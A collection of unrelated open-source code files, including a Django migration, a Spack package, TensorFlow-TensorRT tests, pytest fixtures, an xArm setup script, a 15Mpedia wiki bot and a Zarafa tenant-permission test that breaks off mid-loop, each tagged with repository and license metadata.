'date_time_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'fire_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'calwildfire_fire_name'", 'null': 'True', 'to': "orm['calfire_tracker.CalWildfire']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'update_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['calfire_tracker'] | SCPR/firetracker | calfire_tracker/migrations/0027_auto__add_field_wildfiredisplaycontent_content_type.py | Python | gpl-2.0 | 11,098 | 0.007839 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyDistributed(PythonPackage):
"""Distributed scheduler for Dask"""
homepage = "https://distributed.dask.org/"
url = "https://pypi.io/packages/source/d/distributed/distributed-2.10.0.tar.gz"
version('2.10.0', sha256='2f8cca741a20f776929cbad3545f2df64cf60207fb21f774ef24aad6f6589e8b')
version('1.28.1', sha256='3bd83f8b7eb5938af5f2be91ccff8984630713f36f8f66097e531a63f141c48a')
depends_on('python@2.7:2.8,3.5:', when='@:1', type=('build', 'run'))
depends_on('python@3.6:', when='@2:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('py-click@6.6:', type=('build', 'run'))
depends_on('py-cloudpickle@0.2.2:', type=('build', 'run'))
depends_on('py-msgpack', type=('build', 'run'))
depends_on('py-psutil@5.0:', type=('build', 'run'))
depends_on('py-six', type=('build', 'run'), when='@:1')
depends_on('py-sortedcontainers@:1.999,2.0.2:', type=('build', 'run'))
depends_on('py-tblib', type=('build', 'run'))
depends_on('py-toolz@0.7.4:', type=('build', 'run'))
depends_on('py-tornado@5:', type=('build', 'run'))
depends_on('py-zict@0.1.3:', type=('build', 'run'))
depends_on('py-pyyaml', type=('build', 'run'))
depends_on('py-futures', when='@:1 ^python@2.7:2.8', type=('build', 'run'))
depends_on('py-singledispatch', when='@:1 ^python@2.7:2.8', type=('build', 'run'))
def patch(self):
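        # Strip the dask requirement from requirements.txt, presumably so pip does not try to enforce it here
        # (distributed and dask depend on each other, which would otherwise create a circular dependency).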
filter_file('^dask .*', '', 'requirements.txt')
| rspavel/spack | var/spack/repos/builtin/packages/py-distributed/package.py | Python | lgpl-2.1 | 1,699 | 0.002943 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Basic tests for TF-TensorRT integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.tensorrt.test import tf_trt_integration_test_base as trt_test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class ReshapeTest(trt_test.TfTrtIntegrationTestBase):
def GetParams(self):
dtype = dtypes.float32
input_name = "input"
input_dims = [100, 24, 24, 2]
output_name = "output"
g = ops.Graph()
with g.as_default():
inp = array_ops.placeholder(
dtype=dtype, shape=[None] + input_dims[1:], name=input_name)
outputs = []
# Here we test two types of reshapes, one changes the batch dimension and
# the other does not. Note that we're not able to test reshaping to
# scalar, since TRT requires input tensor to be of rank at least 2, so a
# reshape with scalar input will be filtered out of the segment before
# conversion.
with g.device("/GPU:0"):
# These reshapes happen at batch dimension, thus conversion should fail.
for shape in [[2, 50, 24, 24, 2], [-1, 50, 24, 24, 2],
[2, 50, -1, 24, 2]]:
incompatible_reshape = array_ops.reshape(inp, shape)
reshape_back = array_ops.reshape(incompatible_reshape,
[-1, 24, 24, 2])
outputs.append(self.trt_incompatible_op(reshape_back))
# Add another block with many reshapes that don't change the batch
# dimension.
compatible_reshape = array_ops.reshape(
inp, [-1, 24 * 24, 2], name="reshape-0")
compatible_reshape = array_ops.reshape(
compatible_reshape, [100, 24, -1], name="reshape-1")
compatible_reshape = array_ops.reshape(
compatible_reshape, [100, 24 * 2, 24], name="reshape-2")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 24, 24 * 2], name="reshape-3")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 6, 4, 24, 2], name="reshape-4")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 6, 4, 6, 4, 2, 1], name="reshape-5")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 24, 24, 2], name="reshape-6")
outputs.append(self.trt_incompatible_op(compatible_reshape))
math_ops.add_n(outputs, name=output_name)
return trt_test.TfTrtIntegrationTestParams(
gdef=g.as_graph_def(),
input_names=[input_name],
input_dims=[input_dims],
output_names=[output_name],
expected_output_dims=[tuple(input_dims)])
def ExpectedEnginesToBuild(self, run_params):
"""Return the expected engines to build."""
return {
"TRTEngineOp_0": ["reshape-%d" % i for i in range(7)] +
["reshape-%d/shape" % i for i in range(7)]
}
def ShouldRunTest(self, run_params):
"""Whether to run the test."""
return (not trt_test.IsQuantizationMode(run_params.precision_mode) and
not run_params.dynamic_engine)
class TransposeTest(trt_test.TfTrtIntegrationTestBase):
def GetParams(self):
"""Create a graph containing single segment."""
dtype = dtypes.float32
input_name = "input"
input_dims = [100, 24, 24, 2]
output_name = "output"
g = ops.Graph()
with g.as_default():
inp = array_ops.placeholder(
dtype=dtype, shape=[None] + input_dims[1:], name=input_name)
with g.device("/GPU:0"):
# Add a block with compatible transposes.
compatible_transpose = array_ops.transpose(
inp, [0, 3, 1, 2], name="transpose-1")
compatible_transpose = array_ops.transpose(
compatible_transpose, [0, 2, 3, 1], name="transposeback")
# Add an incompatible op so the first block will not be in the same
# subgraph where the following block belongs.
bridge = self.trt_incompatible_op(compatible_transpose)
# Add a block with incompatible transposes.
#
# Note: by default Grappler will run the TRT optimizer twice. At the
# first time it will group the two transpose ops below to same segment
# then fail the conversion due to the expected batch dimension problem.
# At the second time, since the input of bridge op is TRTEngineOp_0, it
# will fail to do shape inference which then cause conversion to fail.
# TODO(laigd): support shape inference, make TRT optimizer run only
# once, and fix this.
incompatible_transpose = array_ops.transpose(
bridge, [2, 1, 0, 3], name="transpose-2")
excluded_transpose = array_ops.transpose(
incompatible_transpose, [0, 2, 3, 1], name="transpose-3")
array_ops.identity(excluded_transpose, name=output_name)
return trt_test.TfTrtIntegrationTestParams(
gdef=g.as_graph_def(),
input_names=[input_name],
input_dims=[input_dims],
output_names=[output_name],
expected_output_dims=[(24, 100, 2, 24)])
def ExpectedEnginesToBuild(self, run_params):
"""Return the expected engines to build."""
return {
"TRTEngineOp_0": [
"transpose-1", "transpose-1/perm", "transposeback",
"transposeback/perm"
]
}
def ShouldRunTest(self, run_params):
"""Whether to run the test."""
return (not trt_test.IsQuantizationMode(run_params.precision_mode) and
not run_params.dynamic_engine)
if __name__ == "__main__":
test.main()
| hfp/tensorflow-xsmm | tensorflow/contrib/tensorrt/test/reshape_transpose_test.py | Python | apache-2.0 | 6,477 | 0.003705 |
import pytest
import sys
import logging
from sqlalchemy import create_engine
import zk.model.meta as zkmeta
import zkpylons.model.meta as pymeta
from zkpylons.config.routing import make_map
from paste.deploy import loadapp
from webtest import TestApp
from paste.fixture import Dummy_smtplib
from .fixtures import ConfigFactory
from ConfigParser import ConfigParser
# Get settings from config file, only need it once
ini = ConfigParser()
ini_filename = "test.ini"
ini.read(ini_filename)
# Logging displayed by passing -s to pytest
#logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
@pytest.yield_fixture
def map():
config = {
'pylons.paths' : { 'controllers' : None },
'debug' : True,
}
yield make_map(config)
@pytest.yield_fixture
def app():
wsgiapp = loadapp('config:'+ini_filename, relative_to=".")
app = TestApp(wsgiapp)
yield app
class DoubleSession(object):
# There is an issue with the zkpylons -> zk migration
# Some files use zk.model, which uses zk.model.meta.Session
# Some files use zkpylons.model, which uses zkpylons.model.meta.Session
# Some files use relative paths, which means you can kinda guess at it
# The best way around this is to configure both Session objects
# But then operations frequently have to be applied to both
# This class wraps operations needed for testing, and applies both
def __init__(self, session1, session2):
self.s1 = session1
self.s2 = session2
def remove(self):
self.s1.remove()
self.s2.remove()
def configure(self, engine):
self.s1.configure(bind=engine)
self.s2.configure(bind=engine)
self.s1.configure(autoflush=False)
self.s2.configure(autoflush=False)
def commit(self):
self.s1.commit()
self.s2.commit()
# TODO: Maybe expire_all or refresh would be better
def expunge_all(self):
self.s1.expunge_all()
self.s2.expunge_all()
def query(self, cls):
return self.s1.query(cls)
def execute(self, *args, **kwargs):
return self.s1.execute(*args, **kwargs)
base_general_config = {
'sponsors' : {"top":[],"slideshow":[]},
'account_creation' : True,
'cfp_status' : "open",
'conference_status' : "open",
}
base_rego_config = {
'personal_info' : {"phone":"yes","home_address":"yes"}
}
@pytest.yield_fixture
def db_session():
# Set up SQLAlchemy to provide DB access
dsess = DoubleSession(zkmeta.Session, pymeta.Session)
# Clean up old sessions if they exist
dsess.remove()
engine = create_engine(ini.get("app:main", "sqlalchemy.url"))
# Drop all data to establish known state, mostly to prevent primary-key conflicts
engine.execute("drop schema if exists public cascade")
engine.execute("create schema public")
zkmeta.Base.metadata.create_all(engine)
dsess.configure(engine)
# Create basic config values, to allow basic pages to render
for key, val in base_general_config.iteritems():
ConfigFactory(key=key, value=val)
for key, val in base_rego_config.iteritems():
ConfigFactory(category='rego', key=key, value=val)
dsess.commit()
# Run the actual test
yield dsess
# No rollback, for functional tests we have to actually commit to DB
@pytest.yield_fixture
def smtplib():
Dummy_smtplib.install()
yield Dummy_smtplib
if Dummy_smtplib.existing:
Dummy_smtplib.existing.reset()
| zookeepr/zookeepr | zkpylons/tests/functional/conftest.py | Python | gpl-2.0 | 3,543 | 0.007056 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
TRANSACTION_STATUS = (
('P', _('pending')),
('F', _('failed')),
('C', _('complete')),
)
class Transaction(models.Model):
user = models.ForeignKey(User, blank = True, null = True, default = None,
verbose_name = _("user"), help_text = _("user who started transaction"))
description = models.CharField(_("reference description"), max_length = 255, help_text = _("reference description"))
amount = models.FloatField(_("amount"))
currency = models.CharField(_("currency"), max_length = 3)
details = models.CharField(_("details"), max_length = 255, help_text = _("payment details"))
created = models.DateTimeField(auto_now_add = True)
last_modified = models.DateTimeField(auto_now = True)
status = models.CharField(_("status"), max_length = 1, default = 'P')
redirect_after_success = models.CharField(max_length = 255, editable = False)
redirect_on_failure = models.CharField(max_length = 255, editable = False)
def __unicode__(self):
return _("transaction %s " % self.pk)
class Meta:
verbose_name = _("transaction")
ordering = ['-last_modified']
| truevision/django_banklink | django_banklink/models.py | Python | bsd-3-clause | 1,291 | 0.035631 |
# coding=utf-8
''' tagsPlorer package entry point (C) 2021-2021 Arne Bachmann https://github.com/ArneBachmann/tagsplorer '''
from tagsplorer import tp
tp.Main().parse_and_run() | ArneBachmann/tagsplorer | tagsplorer/__main__.py | Python | mpl-2.0 | 183 | 0.010929 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-25 23:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('journal', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='JournalEntryTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='Name')),
],
),
migrations.AddField(
model_name='journalentry',
name='tags',
field=models.ManyToManyField(blank=True, to='journal.JournalEntryTag', verbose_name='Tags this entry has'),
),
]
| diegojromerolopez/djanban | src/djanban/apps/journal/migrations/0002_auto_20160926_0155.py | Python | mit | 819 | 0.002442 |
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, UFactory, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc>
import os
from distutils.util import convert_path
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
def find_packages(base_path='.'):
base_path = convert_path(base_path)
found = []
for root, dirs, files in os.walk(base_path, followlinks=True):
dirs[:] = [d for d in dirs if d[0] != '.' and d not in ('ez_setup', '__pycache__')]
relpath = os.path.relpath(root, base_path)
parent = relpath.replace(os.sep, '.').lstrip('.')
if relpath != '.' and parent not in found:
# foo.bar package but no foo package, skip
continue
for dir in dirs:
if os.path.isfile(os.path.join(root, dir, '__init__.py')):
package = '.'.join((parent, dir)) if parent else dir
found.append(package)
return found
main_ns = {}
ver_path = convert_path('xarm/version.py')
with open(os.path.join(os.getcwd(), ver_path)) as ver_file:
exec(ver_file.read(), main_ns)
version = main_ns['__version__']
# long_description = open('README.rst').read()
long_description = 'long description for xArm-Python-SDK'
with open(os.path.join(os.getcwd(), 'requirements.txt')) as f:
requirements = f.read().splitlines()
setup(
name='xArm-Python-SDK',
version=version,
author='Vinman',
description='Python SDK for xArm',
packages=find_packages(),
author_email='vinman@ufactory.cc',
install_requires=requirements,
long_description=long_description,
license='MIT',
zip_safe=False
)
| xArm-Developer/xArm-Python-SDK | setup.py | Python | bsd-3-clause | 1,795 | 0.000557 |
import json
import base64
from django.test import TestCase
from django.core.urlresolvers import reverse
from django.conf import settings
from ..views import register, agents
from ..models import Agent
class AgentTests(TestCase):
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
self.username = "tester"
self.password = "test"
self.email = "test@example.com"
self.auth = "Basic %s" % base64.b64encode("%s:%s" % (self.username, self.password))
form = {'username':self.username,'password':self.password,'password2':self.password, 'email':self.email}
        self.client.post(reverse(register), form, X_Experience_API_Version=settings.XAPI_VERSION)
def test_get_no_agents(self):
agent = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
response = self.client.get(reverse(agents), {'agent':agent}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.status_code, 404)
self.assertEqual(response.content, "Error with Agent. The agent partial did not match any agents on record")
def test_get(self):
a = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
Agent.objects.retrieve_or_create(**json.loads(a))
response = self.client.get(reverse(agents), {'agent':a}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
r_data = json.loads(response.content)
self.assertTrue(isinstance(r_data['mbox'], list))
self.assertTrue(isinstance(r_data['name'], list))
self.assertEqual(r_data['mbox'], ['mailto:me@example.com'])
self.assertEqual(r_data['name'], ['me'])
self.assertEqual(r_data['objectType'], 'Person')
self.assertIn('content-length', response._headers)
def test_get_no_existing_agent(self):
a = json.dumps({"mbox":"mailto:fail@fail.com"})
response = self.client.get(reverse(agents), {'agent':a}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.content, 'Error with Agent. The agent partial did not match any agents on record')
self.assertEqual(response.status_code, 404)
def test_head(self):
a = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
Agent.objects.retrieve_or_create(**json.loads(a))
response = self.client.head(reverse(agents), {'agent':a}, Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.content, '')
self.assertIn('content-length', response._headers)
def test_get_no_agent(self):
response = self.client.get(reverse(agents), Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.status_code, 400)
def test_post(self):
agent = json.dumps({"name":"me","mbox":"mailto:me@example.com"})
response = self.client.post(reverse(agents), {'agent':agent},content_type='application/x-www-form-urlencoded', Authorization=self.auth, X_Experience_API_Version=settings.XAPI_VERSION)
self.assertEqual(response.status_code, 405) | frasern/ADL_LRS | lrs/tests/AgentTests.py | Python | apache-2.0 | 3,199 | 0.012504 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <ahernandez@emergya.com>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <devmaster@guadalinex.org>"
__license__ = "GPL-2"
from gi.repository import Gtk
from gi.repository import GObject
from . helpers import get_builder, show_uri, get_help_uri
# This class is meant to be subclassed by FirstbootWindow. It provides
# common functions and some boilerplate.
class Window(Gtk.Window):
__gtype_name__ = "Window"
# To construct a new instance of this method, the following notable
# methods are called in this order:
# __new__(cls)
# __init__(self)
# finish_initializing(self, builder)
# __init__(self)
#
# For this reason, it's recommended you leave __init__ empty and put
# your initialization code in finish_initializing
def __init__(self):
GObject.GObject.__init__(self)
def __new__(cls):
"""Special static method that's automatically called by Python when
constructing a new instance of this class.
Returns a fully instantiated BaseFirstbootWindow object.
"""
builder = get_builder(cls.__gtype_name__)
new_object = builder.get_object(cls.__gtype_name__)
new_object._finish_initializing(builder)
return new_object
def _finish_initializing(self, builder):
"""Called while initializing this instance in __new__
finish_initializing should be called after parsing the UI definition
and creating a FirstbootWindow object with it in order to finish
initializing the start of the new FirstbootWindow instance.
"""
# Get a reference to the builder and set up the signals.
self.builder = builder
self.ui = builder.get_ui(self, True)
self.connect("delete_event", self.on_delete_event)
self.translate()
self.finish_initializing(builder)
def finish_initializing(self, builder):
pass
def on_destroy(self, widget, data=None):
"""Called when the FirstbootWindow is closed."""
# Clean up code for saving application state should be added here.
Gtk.main_quit()
def on_delete_event(self, widget, data=None):
return False
    def translate(self):
        pass
| gecos-team/gecosws-agent | gecosfirstlogin_lib/Window.py | Python | gpl-2.0 | 3,073 | 0.000651 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2014 emijrp
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import catlib
import os
import pagegenerators
import re
import urllib
import wikipedia
"""
Makes some basic replacements on Podemos circle pages
and uploads the circle's image, if it is available on Twitter.
"""
def main():
site = wikipedia.Site('15mpedia', '15mpedia')
cat = catlib.Category(site, u"Category:Círculos de Podemos")
gen = pagegenerators.CategorizedPageGenerator(cat)
pre = pagegenerators.PreloadingGenerator(gen, pageNumber=60)
for page in pre:
wtitle = page.title()
wtext = page.get()
if not re.search(ur"(?im)\{\{\s*Infobox Nodo", wtext):
continue
print '\n===', wtitle, '==='
newtext = wtext
suffix = ' '.join(wtitle.split(' ')[1:])
if re.search(ur"(?im)\{\{\s*nodos\s*\}\}", newtext) and not re.search(ur"(?im)\{\{\s*podemos\s*\}\}", newtext):
newtext = re.sub(ur"(?im)\{\{\s*nodos\s*\}\}", ur"{{podemos}}", newtext)
if re.search(ur"(?im)^'''([^\']+)''' es un \[\[nodo\]\]( de \[\[Podemos\]\])?\.", newtext):
newtext = re.sub(ur"(?im)^'''([^\']+)''' es un \[\[nodo\]\](?: de \[\[Podemos\]\])?\.", ur"'''\1''' es un [[Lista de círculos de Podemos|círculo]] de [[Podemos]] de [[%s]]." % (suffix), newtext)
if re.search(ur"(?im)== Enlaces externos ==\s*\*[^\r\n]+\r\n", newtext):
newtext = re.sub(ur"(?im)== Enlaces externos ==\s*\*[^\r\n]+\r\n", ur"== Enlaces externos ==\n{{enlaces externos}}\n", newtext)
newtext = re.sub(ur"(?im)\[\[Categoría:Podemos\]\]", ur"", newtext)
newtext = re.sub(ur"(?im)\[\[Categoría:Nodos\]\]", ur"[[Categoría:Círculos de Podemos|%s]]" % (suffix), newtext)
newtext = re.sub(ur"(?im)\[\[Categoría:Círculos de Podemos\]\]", ur"[[Categoría:Círculos de Podemos|%s]]" % (suffix), newtext)
newtext = re.sub(ur"(?im)== Véase también ==\r\n\* \[\[Lista de nodos de Podemos\]\]\r\n\r\n", ur"== Véase también ==\n* [[Podemos]]\n* [[Lista de círculos de Podemos]]\n\n", newtext)
if wtext != newtext:
wikipedia.showDiff(wtext, newtext)
page.put(newtext, u"BOT - Unificando círculos")
        # image
if not re.search(ur"(?im)\|\s*imagen\s*=", newtext):
twitter = re.findall(ur"(?im)\|\s*twitter\s*=([^\r\n]+)\r\n", newtext)
if twitter:
twitter = twitter[0].split(',')[0].strip()
f = urllib.urlopen("https://twitter.com/%s" % twitter)
html = unicode(f.read(), 'utf-8')
imageurl = re.findall(ur"data-resolved-url-large=\"(https://pbs.twimg.com/profile_images/[^\"]+)\"", html)
if imageurl:
imageurl = imageurl[0]
if 'default_profile' in imageurl:
print 'Default twitter image, skiping'
continue
desc = u"{{Infobox Archivo\n|embebido id=\n|embebido usuario=\n|embebido título=\n|descripción=Logotipo de [[%s]].\n|fuente={{twitter|%s}}\n}}" % (wtitle, twitter)
if imageurl.endswith('jpeg') or imageurl.endswith('jpg'):
ext = 'jpg'
elif imageurl.endswith('pneg') or imageurl.endswith('png'):
ext = 'png'
else:
print 'Twitter image extension is %s, skiping' % (imageurl.split('.')[-1])
continue
imagename = u"%s.%s" % (wtitle, ext)
#https://www.mediawiki.org/wiki/Manual:Pywikibot/upload.py
os.system('python upload.py -lang:15mpedia -family:15mpedia -keep -filename:"%s" -noverify "%s" "%s"' % (imagename.encode('utf-8'), imageurl.encode('utf-8'), desc.encode('utf-8')))
newtext = re.sub(ur"(?im)\{\{Infobox Nodo", ur"{{Infobox Nodo\n|imagen=%s" % (imagename), newtext)
wikipedia.showDiff(wtext, newtext)
page.put(newtext, u"BOT - Añadiendo imagen")
if __name__ == '__main__':
main()
| 15Mpedia/15Mpedia-scripts | completa-circulos-podemos.py | Python | gpl-3.0 | 4,844 | 0.020544 |
GnomeXzPackage ('atk', version_major = '2.16', version_minor = '0')
| BansheeMediaPlayer/bockbuild | packages/atk.py | Python | mit | 68 | 0.073529 |
# Copyright 2012 - 2013 Zarafa B.V.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation with the following additional
# term according to sec. 7:
#
# According to sec. 7 of the GNU Affero General Public License, version
# 3, the terms of the AGPL are supplemented with the following terms:
#
# "Zarafa" is a registered trademark of Zarafa B.V. The licensing of
# the Program under the AGPL does not imply a trademark license.
# Therefore any rights, title and interest in our trademarks remain
# entirely with us.
#
# However, if you propagate an unmodified version of the Program you are
# allowed to use the term "Zarafa" to indicate that you distribute the
# Program. Furthermore you may use our trademarks where it is necessary
# to indicate the intended purpose of a product or service provided you
# use it in accordance with honest practices in industrial or commercial
# matters. If you want to propagate modified versions of the Program
# under the name "Zarafa" or "Zarafa Server", you may only do so if you
# have a written permission by Zarafa B.V. (to acquire a permission
# please contact Zarafa at trademark@zarafa.com).
#
# The interactive user interface of the software displays an attribution
# notice containing the term "Zarafa" and/or the logo of Zarafa.
# Interactive user interfaces of unmodified and modified versions must
# display Appropriate Legal Notices according to sec. 5 of the GNU
# Affero General Public License, version 3, when you propagate
# unmodified or modified versions of the Program. In accordance with
# sec. 7 b) of the GNU Affero General Public License, version 3, these
# Appropriate Legal Notices must retain the logo of Zarafa or display
# the words "Initial Development by Zarafa" if the display of the logo
# is not reasonably feasible for technical reasons. The use of the logo
# of Zarafa in Legal Notices is allowed for unmodified and modified
# versions of the software.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from libzsm.rest_client.utils import get_api
from libzsm.rest_client.exc import Http403
from common import ApiTestBase
class AuthorizationTest(ApiTestBase):
def __init__(self, *args, **kwargs):
super(AuthorizationTest, self).__init__(*args, **kwargs)
self.s = get_api()
def setUp(self):
        ''' Tenant hierarchy used in these tests:

            Trans [Hank (adm), Jeeves]
                  |
                  v
            Wheels [Rob]      ->     Cars [Jack]
                  |
                  v
            Bikes [Harry]

        Refer to the diagram:
        https://confluence.zarafa.com/pages/viewpage.action?pageId=20841313
        '''
## Hank is a tenant admin
data = dict(
name=u'trans',
)
self.ten_trans = self.s.create_tenant(initial=data)
data = dict(
username=u'hank',
password=u'nk',
name=u'Hank',
surname=u'R',
tenant=self.ten_trans,
userServer=self.server1,
)
self.trans_hank = self.s.create_user(initial=data)
data = {
'permissions': [
'ViewContact',
'ViewGroup',
'ViewGroupPrivileges',
'ViewTenant',
'ViewTenantAcl',
'ViewUser',
'ViewUserPrivileges',
'WriteContact',
'WriteGroup',
'WriteGroupPrivileges',
'WriteTenant',
'WriteTenantAcl',
'WriteUser',
'WriteUserPrivileges',
],
'user': self.trans_hank.resourceUri,
}
self.s.add_tenant_ace(self.ten_trans, data)
data = [
u'CreateTenant',
]
self.s.put_user_privs(self.trans_hank, data)
self.s_trans_hank = self.s.get_session(self.trans_hank)
## Jeeves is Hank's butler
data = dict(
username=u'jeeves',
password=u'jv',
name=u'Jeeves',
surname=u'H',
tenant=self.ten_trans,
userServer=self.server1,
)
self.trans_jeeves = self.s_trans_hank.create_user(initial=data)
self.s_trans_jeeves = self.s.get_session(self.trans_jeeves)
## Trans has a customer Wheels with a user Rob
data = dict(
name=u'wheels',
)
self.ten_wheels = self.s_trans_hank.create_tenant(initial=data)
data = dict(
username=u'rob',
password=u'rb',
name=u'Rob',
surname=u'Dole',
tenant=self.ten_wheels,
userServer=self.server1,
)
self.wheels_rob = self.s_trans_hank.create_user(initial=data)
data = [
u'CreateTenant',
]
self.s_trans_hank.put_user_privs(self.wheels_rob, data)
self.s_wheels_rob = self.s.get_session(self.wheels_rob)
## Wheels has a customer Bikes with a user Harry
data = dict(
name=u'bikes',
)
self.ten_bikes = self.s_wheels_rob.create_tenant(initial=data)
data = dict(
username=u'harry',
password=u'hr',
name=u'Harry',
surname=u'W',
tenant=self.ten_bikes,
userServer=self.server1,
)
self.bikes_harry = self.s_wheels_rob.create_user(initial=data)
self.s_bikes_harry = self.s.get_session(self.bikes_harry)
## Wheels has a customer Cars with a user Jack
data = dict(
name=u'cars',
)
self.ten_cars = self.s_wheels_rob.create_tenant(initial=data)
data = dict(
username=u'jack',
password=u'jk',
name=u'Jack',
surname=u'Hicks',
tenant=self.ten_cars,
userServer=self.server1,
)
self.cars_jack = self.s_wheels_rob.create_user(initial=data)
self.s_cars_jack = self.s.get_session(self.cars_jack)
## Set some handy groupings
self.all_tenants = [
self.ten_trans,
self.ten_wheels,
self.ten_bikes,
self.ten_cars,
]
def tearDown(self):
self.s_wheels_rob.delete_tenant(self.ten_bikes)
self.s_wheels_rob.delete_tenant(self.ten_cars)
self.s_trans_hank.delete_tenant(self.ten_wheels)
self.s.delete_tenant(self.ten_trans)
def test_neg_tenant_access(self):
## Hank only sees the tenants he created
tens = self.s_trans_hank.all_tenant()
self.assertEqual(2, len(tens), u'Incorrect number of tenants.')
self.verify_iterable(tens, [self.ten_trans, self.ten_wheels])
## Jeeves sees no tenants
tens = self.s_trans_jeeves.all_tenant()
self.assertEqual(0, len(tens), u'Incorrect number of tenants.')
## Rob sees Bikes and Cars
tens = self.s_wheels_rob.all_tenant()
self.assertEqual(2, len(tens), u'Incorrect number of tenants.')
self.verify_iterable(tens, [self.ten_bikes, self.ten_cars])
## Harry sees no tenants
tens = self.s_bikes_harry.all_tenant()
self.assertEqual(0, len(tens), u'Incorrect number of tenants.')
## Jack sees no tenants
tens = self.s_cars_jack.all_tenant()
self.assertEqual(0, len(tens), u'Incorrect number of tenants.')
## Hank can access Trans and Wheels, not Bikes or Cars
self.s_trans_hank.get_tenant(id=self.ten_trans.id)
self.s_trans_hank.get_tenant(id=self.ten_wheels.id)
with self.assertRaises(Http403):
self.s_trans_hank.get_tenant(id=self.ten_bikes.id)
with self.assertRaises(Http403):
self.s_trans_hank.get_tenant(id=self.ten_cars.id)
## Rob cannot access Trans nor Wheels, only Bikes and Cars
with self.assertRaises(Http403):
self.s_wheels_rob.get_tenant(id=self.ten_trans.id)
with self.assertRaises(Http403):
self.s_wheels_rob.get_tenant(id=self.ten_wheels.id)
self.s_wheels_rob.get_tenant(id=self.ten_bikes.id)
self.s_wheels_rob.get_tenant(id=self.ten_cars.id)
## Jeeves, Harry and Jack cannot access any tenants
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
for tenant in self.all_tenants:
with self.assertRaises(Http403):
session.get_tenant(id=tenant.id)
def test_neg_tenant_creation(self):
## Jeeves, Harry and Jack cannot create tenants
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
with self.assertRaises(Http403):
data = dict(
name=u'dummy',
)
session.create_tenant(initial=data)
def test_neg_user_access(self):
## Jeeves, Harry and Jack cannot access users on any tenant
sessions = [
self.s_trans_jeeves,
self.s_bikes_harry,
self.s_cars_jack,
]
for session in sessions:
for tenant in self.all_tenants:
